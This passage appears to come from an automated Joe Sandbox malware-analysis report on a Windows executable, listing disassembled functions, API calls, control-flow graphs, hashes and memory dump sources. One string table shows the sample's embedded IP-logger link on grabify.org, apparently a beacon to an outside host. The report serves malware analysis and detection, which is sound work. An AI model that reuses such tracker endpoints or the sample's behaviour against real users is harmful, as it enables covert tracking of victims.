                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                              • Instruction ID: cfe817a34c3c5f2941da33a15fcb8d8e5553d8807e070374dd4ca8ac995e889c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD11267724004243DA45862DCEBC6B7E396FFC532172C437BC0426B7C8C1BAAC45A608
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 210 4068f5-406905 GetModuleHandleA 211 406910-406958 GetProcAddress * 4 210->211 212 406907-40690f call 406648 210->212 214 406970-40698f 211->214 215 40695a-406961 211->215 217 406994-4069a2 TlsAlloc 214->217 215->214 216 406963-40696a 215->216 216->214 219 40696c-40696e 216->219 220 406a74 217->220 221 4069a8-4069b3 TlsSetValue 217->221 219->214 219->217 222 406a76-406a78 220->222 221->220 223 4069b9-406a08 call 406242 call 406546 * 4 call 4050ee 221->223 236 406a0a-406a25 call 4065b2 223->236 237 406a6f call 406648 223->237 236->237 242 406a27-406a39 call 4093a0 236->242 237->220 242->237 245 406a3b-406a52 call 4065b2 242->245 245->237 249 406a54-406a6d call 406685 GetCurrentThreadId 245->249 249->222
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004032D1), ref: 004068FB
                                                                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00406907
                                                                                                                                                                                                                                                                • Part of subcall function 00406648: __decode_pointer.LIBCMT ref: 00406659
                                                                                                                                                                                                                                                                • Part of subcall function 00406648: TlsFree.KERNEL32(0000000E,00406A74), ref: 00406673
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040691D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040692A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00406937
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406944
                                                                                                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 00406994
                                                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 004069AF
                                                                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 004069B9
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069C4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069D4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069E4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069F4
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 00406A15
                                                                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00406A2E
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 00406A48
                                                                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00406A57
                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406A5E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                              • API String ID: 2657569430-3819984048
                                                                                                                                                                                                                                                              • Opcode ID: dd9c942f510c8cbf7b741161731a130b64e08462a1f4c216e580e18ae0143119
                                                                                                                                                                                                                                                              • Instruction ID: 3e6afccfaca81f5d0103fedc316d18b579f0ddb50245cd779906375d6cdb54ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd9c942f510c8cbf7b741161731a130b64e08462a1f4c216e580e18ae0143119
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0031A3F4E02610EADB20AF76BD05A167AA5EB46754B11493FF812F22F0DB798460CF5C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 252 401ff0-40202e 253 402032-40203c call 402d00 252->253 255 402058-40206c call 402d00 253->255 256 40203e-402052 call 402d00 253->256 262 402085-402090 255->262 263 40206e-402083 255->263 256->255 261 4021fd-402210 call 4027ab 256->261 264 402096-4020a6 call 402d00 262->264 263->264 269 4020b1-4020b3 264->269 270 4020a8-4020af 264->270 271 4020b6-4020bd 269->271 272 4020c4-4020f6 call 402c34 call 403de0 call 403e60 call 402d00 270->272 271->271 273 4020bf-4020c1 271->273 282 402137-40214a call 402c34 272->282 283 4020f8-4020fd 272->283 273->272 288 40214f-402162 call 402d00 282->288 285 402100-402107 283->285 285->285 287 402109-402124 call 402c34 call 403de0 285->287 297 402127-402133 287->297 295 402164-40216e 288->295 296 4021a6-4021ac 288->296 299 402171-402178 295->299 298 4021b0-4021b7 296->298 297->297 300 402135 297->300 298->298 301 4021b9-4021bb 298->301 299->299 302 40217a-4021a4 call 403e60 call 4030f9 299->302 300->288 303 4021be-4021fc call 402c34 call 403de0 call 403e60 call 4027ab 301->303 302->303
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _malloc$_memset$_sscanf
                                                                                                                                                                                                                                                              • String ID: http://$https://$https://grabify.org/1wxS
                                                                                                                                                                                                                                                              • API String ID: 3562546547-2243597105
                                                                                                                                                                                                                                                              • Opcode ID: 7ca267f47b0bbe4fd8b7c8ec0aca4eb17133205b1f5f5d7ae0b0adeddff11272
                                                                                                                                                                                                                                                              • Instruction ID: 04648c2704c8df8df0a262ed70051c55dacd21bfe2762a4372ee7066968d4f18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ca267f47b0bbe4fd8b7c8ec0aca4eb17133205b1f5f5d7ae0b0adeddff11272
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC517B725043016BD710DF298D0AB5B7BE5AF85308F18452EF948BB3C1D6BDD904C79A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: __mtinitlocknum.LIBCMT ref: 00405278
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: __amsg_exit.LIBCMT ref: 00405284
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: EnterCriticalSection.KERNEL32(?,?,?,0040BD2E,00000004,0044AD90,0000000C,004093B3,?,?,00000000,00000000,00000000,0040676E,00000001,00000214), ref: 0040528C
                                                                                                                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                                                                                                                              • Opcode ID: d3f1ce3d0c091cffb581d3c8956bed276382fe299b658f6b4fdd416956a9a656
                                                                                                                                                                                                                                                              • Instruction ID: 4460b38731b88224fb186ba4f1206185b519f30374d862fce58076fd2da0bb21
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3f1ce3d0c091cffb581d3c8956bed276382fe299b658f6b4fdd416956a9a656
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56018F31804715AAEF206F72AD0EB5B3B74AF00765F20447FF405761C1DABCA9809EAC
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0040275B
                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040278D
                                                                                                                                                                                                                                                                • Part of subcall function 0040346B: RaiseException.KERNEL32(?,?,00402ADB,?,?,?,?,?,00402ADB,?,0044AEB0,0044D160), ref: 004034AB
                                                                                                                                                                                                                                                                • Part of subcall function 00401BC0: std::exception::exception.LIBCMT ref: 00401BEE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                                                                                                              • String ID: (@$invalid string position
                                                                                                                                                                                                                                                              • API String ID: 2977319401-1301154146
                                                                                                                                                                                                                                                              • Opcode ID: df56834322b885f407402cb1609de731c652524eb200d84411b32e2617127052
                                                                                                                                                                                                                                                              • Instruction ID: c130225eb8f595a09aa5eaee85491a4b889f3b67d2352e031182bf042fa89ac7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df56834322b885f407402cb1609de731c652524eb200d84411b32e2617127052
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6E03071910118AAD704FBD6D801ECEBBBCAF04355F10497FB200B61D2DBB89554CB6D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B816
                                                                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 0040B84A
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00409883,?,?,00000002), ref: 0040B87B
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00409883,?,?,00000002), ref: 0040B8E9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                                                                              • Opcode ID: f42b53b8aa7ddd51646c6e389545eef6affaf647b84a38677d11fe2463d46b0c
                                                                                                                                                                                                                                                              • Instruction ID: 04c4206088e162f240fb64e728f365c33255b7101941b0580c2359484fceb174
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f42b53b8aa7ddd51646c6e389545eef6affaf647b84a38677d11fe2463d46b0c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931B332A10255EFDB20EFA4C8449AE3BA8FF01351F14C57AE451AB2E1D334D941DB9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,0040DA99,?,0044AE50,00000010,0040CE3A,00000000,00000040,00000040,00000040,00000000,?,00000000,0040CEBF), ref: 0040D9B7
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040D9C1
                                                                                                                                                                                                                                                              • __free_osfhnd.LIBCMT ref: 0040D9CE
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0040D9F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr__free_osfhnd
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1721093958-0
                                                                                                                                                                                                                                                              • Opcode ID: 991183d5e15b9201343fa96ce4b89d1dd74fcf33bf86d4857bfd7c5aa9760cd5
                                                                                                                                                                                                                                                              • Instruction ID: af4e8bc5e9103d40532bb548bc30caa7a80e7e8e27848e4e735ceeddbfc665a6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 991183d5e15b9201343fa96ce4b89d1dd74fcf33bf86d4857bfd7c5aa9760cd5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D501D6B3D15220D5D72427BAA98675B66844F82738F16063BF820B72D2CEBCC889D16D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004024CC,004024CA,00000000,00000000,00000000,00000000,00000000,6F752AA0,00000000,6F73F270,?,004024CC,00000000), ref: 00401C75
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401C80
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401C8B
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004024CA,00000000,?,00000000,00000000,?,?,004024CC,00000000,?,?,?,00000004), ref: 00401CA7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_malloc_memset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1563474556-0
                                                                                                                                                                                                                                                              • Opcode ID: 8db40c55e290dcdbb94a9150ee673ff121df60e81232016a808276624f151ab3
                                                                                                                                                                                                                                                              • Instruction ID: 62da757d27d30c4a2d352fb6d1cdf045b3a8a2ec57480c094bf6cd3996650e79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db40c55e290dcdbb94a9150ee673ff121df60e81232016a808276624f151ab3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD0186723453047AF220565A9C47F7B7BDCDBC5B95F150519FB09EB2C0D5A4BD008279
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 004067BC: __getptd_noexit.LIBCMT ref: 004067BD
                                                                                                                                                                                                                                                                • Part of subcall function 004067BC: __amsg_exit.LIBCMT ref: 004067CA
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0040A06D
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0040A07D
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040A09A
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(02071368), ref: 0040A0C5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2880340415-0
                                                                                                                                                                                                                                                              • Opcode ID: dd6e1441f4b84a572239d79ceea4069e832955cf0029aabb0d00b64bf41dc48f
                                                                                                                                                                                                                                                              • Instruction ID: 8d88837ca888eb7a3862d89fc4487393f02573397272efdacaee68a91431d7ee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd6e1441f4b84a572239d79ceea4069e832955cf0029aabb0d00b64bf41dc48f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF017C35E01B159BDA20AF25954675E7260AB01B14F18413BE8007B2C1CB3C6961CBDF
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401CE7
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401CF4
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401CFF
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401D13
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_malloc_memset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1563474556-0
                                                                                                                                                                                                                                                              • Opcode ID: f1ed4db5ec469ee81c55a71d3d7a96df49b2b22931ab4cb5a200e3ae16af3a8d
                                                                                                                                                                                                                                                              • Instruction ID: cb786a35093b211d6184d0593a0389adbfd214d533acf2757ace1d99aadd41be
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1ed4db5ec469ee81c55a71d3d7a96df49b2b22931ab4cb5a200e3ae16af3a8d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EF0BB323452147FF2205B5A9D49FB777ECDF85B89F144055FA04EB2C1C5A1BD1183A9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32 ref: 00401746
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040175C
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00401768
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401782
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3735792614-0
                                                                                                                                                                                                                                                              • Opcode ID: 8249901b8016d95a857edac7dcb86ed988be918a2ff04351d9d808f3cfce4957
                                                                                                                                                                                                                                                              • Instruction ID: 8c21f06872e26a5e7b59f257f75c123fd6dd8060246e91aa355ff782bd38c4e7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8249901b8016d95a857edac7dcb86ed988be918a2ff04351d9d808f3cfce4957
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC012C76018351AAC300DF69C88099FB7F8EFD8344F004E1EF499A3220E670D249CBAB
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:16.1%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:15.5%
                                                                                                                                                                                                                                                              Total number of Nodes:1282
                                                                                                                                                                                                                                                              Total number of Limit Nodes:22
RegOpenKeyExA 3265->3282 3266->3264 3267->3265 3268->3265 3269 408069 SHGetPathFromIDListA CoTaskMemFree 3268->3269 3269->3265 3278 407d48 3271->3278 3272 407dd5 3273 407dde CharPrevA 3272->3273 3274 407dfc 3272->3274 3273->3272 3274->3233 3275 407dc7 CharNextA 3275->3278 3277 407d9c CharNextA 3277->3278 3278->3272 3278->3275 3278->3277 3279 407db8 CharNextA 3278->3279 3289 4078a4 3278->3289 3279->3275 3280->3264 3281->3254 3283 407b81 RegQueryValueExA 3282->3283 3284 407bdc 3282->3284 3285 407bbc RegCloseKey 3283->3285 3284->3265 3285->3284 3287->3264 3290 4078b1 3289->3290 3291 4078c7 3290->3291 3292 4078bb CharNextA 3290->3292 3291->3278 3292->3290 3294 401860 3295 401400 18 API calls 3294->3295 3296 40186c 3295->3296 3313 407935 CharNextA CharNextA 3296->3313 3298 401902 3300 401942 3298->3300 3301 40190e 3298->3301 3299 4078a4 CharNextA 3312 401879 3299->3312 3304 40163b 23 API calls 3300->3304 3309 403677 3300->3309 3302 40163b 23 API calls 3301->3302 3303 40191a 3302->3303 3330 407cb6 lstrcpynA 3303->3330 3304->3309 3307 40192b SetCurrentDirectoryA 3307->3309 3310 4018dd GetFileAttributesA 3310->3312 3312->3298 3312->3299 3312->3310 3319 4082eb 3312->3319 3322 4076b0 CreateDirectoryA 3312->3322 3327 40774b CreateDirectoryA 3312->3327 3314 40795a 3313->3314 3315 4078a4 CharNextA 3314->3315 3318 407976 3314->3318 3316 40798a 3315->3316 3317 4078a4 CharNextA 3316->3317 3316->3318 3317->3318 3318->3312 3331 408299 GetModuleHandleA 3319->3331 3323 407710 3322->3323 3324 407714 GetLastError 3322->3324 3323->3312 3324->3323 3325 407723 SetFileSecurityA 3324->3325 3325->3323 3326 40773f GetLastError 3325->3326 3326->3323 3328 407775 3327->3328 3329 40776f GetLastError 3327->3329 3328->3312 3329->3328 3330->3307 3332 4082bb 3331->3332 3333 4082cc GetProcAddress 3331->3333 3337 40820e GetSystemDirectoryA 3332->3337 3335 4082e2 3333->3335 3335->3312 3336 4082c3 3336->3333 3336->3335 3338 40823c wsprintfA LoadLibraryExA 3337->3338 3338->3336 4122 4020e0 4123 40216e 
